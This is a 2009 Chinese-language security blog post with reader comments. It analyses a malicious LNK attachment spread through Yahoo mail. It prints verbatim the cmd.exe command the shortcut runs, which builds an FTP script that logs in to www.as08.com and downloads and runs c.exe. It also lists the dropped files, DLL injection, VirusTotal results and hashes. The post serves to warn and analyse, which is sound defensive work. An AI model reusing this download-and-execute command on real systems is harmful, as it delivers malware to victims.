Yahoo信箱LNK病毒─「love….超噴飯的」
2009 年 02 月 05 日 – 11:17:38
昨天收到一封Yahoo寄來的郵件,標題為「love….超噴飯的」,郵件內文夾帶一個附件檔,副檔名為「LNK」,連同前幾天收到這類型的郵件,已經有很多封,此類型病毒應該已經流傳一陣子了,請各位小心。注意:記得將防毒軟體即時掃描設定為所有檔案皆掃瞄。
這封Yahoo郵件畫面,如下所示:
此LNK惡意檔案會執行下列命令:
%windir%\system32\cmd.exe /c echo ftp -s:c.c > c.bat&echo c.exe >> c.bat&echo del c.c >> c.bat&echo open www.as08.com > c.c&echo as08>>c.c&echo 888>>c.c&echo get c.exe >> c.c&echo bye >> c.c&c.bat&
此惡意程式執行之後,有下面的行為:
[DLL injection]
C:\WINDOWS\Help\F3C74E3FA248.dll
[Added file]
C:\WINDOWS\Help\F3C74E3FA248.dll
C:\WINDOWS\Help\F3C74E3FA248.exe
C:\WINDOWS\system32\c.bat
[Added COM/BHO]
{1DBD6574-D6D0-4782-94C3-69619E719765}-C:\WINDOWS\HELP\F3C74E3FA248.dll
此惡意程式執行後,有兩個惡意檔案的數位簽章竟然顯示是微軟檔案:
警政署提供的NPASCAN無法在VMWare環境中執行,畫面如下所示(本來想試試看效果勒,希望此工具能支援囉):
下列是 VirusTotal 掃描結果 (僅提供參考)(很慘吧):
檔案 超噴飯的.lnk-1 接收於 2009.02.04 12:03:05 (CET)
反病毒引擎 版本 最後更新 掃瞄結果
a-squared 4.0.0.93 2009.02.04 -
AhnLab-V3 5.0.0.2 2009.02.04 -
AntiVir 7.9.0.71 2009.02.04 -
Authentium 5.1.0.4 2009.02.03 -
Avast 4.8.1281.0 2009.02.03 -
AVG 8.0.0.229 2009.02.03 -
BitDefender 7.2 2009.02.04 -
CAT-QuickHeal 10.00 2009.02.04 -
ClamAV 0.94.1 2009.02.04 -
Comodo 961 2009.02.03 -
DrWeb 4.44.0.09170 2009.02.04 -
eSafe 7.0.17.0 2009.02.01 -
eTrust-Vet 31.6.6341 2009.02.04 -
F-Prot 4.4.4.56 2009.02.03 -
F-Secure 8.0.14470.0 2009.02.04 -
Fortinet 3.117.0.0 2009.02.04 -
GData 19 2009.02.04 -
Ikarus T3.1.1.45.0 2009.02.04 -
K7AntiVirus 7.10.617 2009.02.03 -
Kaspersky 7.0.0.125 2009.02.04 -
McAfee 5515 2009.02.03 -
McAfee+Artemis 5515 2009.02.03 -
Microsoft 1.4306 2009.02.04 -
NOD32 3825 2009.02.04 -
Norman 6.00.02 2009.02.03 -
nProtect 2009.1.8.0 2009.02.04 -
Panda 9.5.1.2 2009.02.03 -
PCTools 4.4.2.0 2009.02.03 -
Prevx1 V2 2009.02.04 -
Rising 21.15.20.00 2009.02.04 -
SecureWeb-Gateway 6.7.6 2009.02.04 -
Sophos 4.38.0 2009.02.04 Mal/DownLnk-A
Sunbelt 3.2.1835.2 2009.01.16 -
Symantec 10 2009.02.04 -
TheHacker 6.3.1.5.246 2009.02.04 -
TrendMicro 8.700.0.1004 2009.02.04 -
VBA32 3.12.8.12 2009.02.04 -
ViRobot 2009.2.4.1589 2009.02.04 -
VirusBuster 4.5.11.0 2009.02.03 -
附加訊息
File size: 2083 bytes
MD5…: 52eb43f19995f08732051ca7a9aec424
SHA1..: f5e20a2460dced6834c182b133b1aefe178dc51c
SHA256: b83f2cf1cd7d7d0ad6af95a4374aadb6fa94f455eb98eba2c39ef49533cc4637
SHA512: 18ad6cbd80dfcc7116b4a90e20d7d949da20a8d4bd3459cf46e791c62557468a
ec827764343917d2e554869b4baf3cc237f149030ebd929062bd2e4f927d5a52
ssdeep: 24:8S2Pj0j8A5aYef2XwGBvhHIwb+4o0KJi8OhKR1Xt0fqmtW1XuxKlEi9J:8Si0
f5cGAwFoIhpg+xy
PEiD..: -
TrID..: File type identification
Windows Shortcut (100.0%)
PEInfo: -
小紅傘線上分析的結果(下一次病毒碼更新,會包含此惡意程式特徵碼):







“Yahoo信箱LNK病毒─「love….超噴飯的」” 目前有 12 迴響
看到有數位簽章時,嚇了一跳,
還好數位簽章是無效的~
By Directnorm on 2009 年 02 月 5 日 - 11:59:21
參考資安論壇:
http://forum.icst.org.tw/phpbb/viewtopic.php?f=8&t=16198
By wscooch on 2009 年 02 月 5 日 - 23:50:44
嗨 Roger好久不見
我剛才試著吧你分析出來的網址丟到TM WRS查詢
未偵測出關於該網址Lose我已經回報
hxxp://www.as08.com
目前手邊沒有虛擬機所以暫時無法測是該網頁所含的惡意程式
如果可以是否可請Roger代勞為大眾把關
By Wayne on 2009 年 02 月 6 日 - 14:00:27
我有用NPASCAN掃過,他掃出下面這個東西,請問Roger大大是正常的嗎?
-==<>==-
Current User : MYCHAT-89C04C70\Administrator
Current IP : 211.76.
Start Time : 06 February 2009 10:37:19
——————Start Scan———————–
C:\WINDOWS\Help\F3C74E3FA248.dll
本機共發現 1 個可疑檔案。
——————-End Scan————————
By Amigo on 2009 年 02 月 7 日 - 22:40:29
這應該是有問題的檔案。如果可以的話,請提供檔案給我(記得用壓縮工具壓縮,並且加密碼,密碼為virus)。
我的Email:roger@malware-test.com
By Roger on 2009 年 02 月 7 日 - 22:48:02
回覆Wayne:那個網址目前已經暫停服務了,所以,無法下載惡意程式。
By Roger on 2009 年 02 月 7 日 - 22:49:02
應該是說那些行為都是之後下載的執行檔產生的
LNK 檔只是單純的作ftp 下載跟執行的動作
根據我們手上一堆樣本的分析之後 這類型的信件應該都可以被偵測到了
只能說每波攻擊之後 病毒作者總能想出另類的方法來突破封鎖
最有效的應該還是在閘道過濾或郵件過濾那邊直接把這類型高風險的檔案格式進行封鎖 畢竟很多檔案類型在正常狀況下都不大可能有人寄的
By Keith Lin on 2009 年 02 月 8 日 - 17:16:48
在Vista 不用怕啦
要記得!!!
有』使用者帳戶控制(UAC)的管制』
只要不要太笨還按允許就好了
By God on 2009 年 02 月 9 日 - 16:15:26
以下這篇文章是趨勢科技資訊安全顧問游啟勝(Kevin),針對這個開春第一隻中文病毒所做的深度分析,有興趣可以來看看:
http://itgroup.blueshop.com.tw/domynews/malwarewiki?n=convew&i=5481
By 崔嘻 on 2009 年 02 月 11 日 - 14:13:10
http://tw.group.knowledge.yahoo.com/fix-computer/article/view?aid=640
By 對面的賢者 on 2009 年 02 月 14 日 - 21:26:58
情色喜劇之我愛友家.lnk
3K 下載
—————
這又是一隻類似檔案
還假好心提醒 —- 不过有点儿童不宜
By wiseman on 2009 年 03 月 28 日 - 15:00:55
收到打開會怎樣?
By kawaiyi on 2009 年 10 月 3 日 - 01:51:22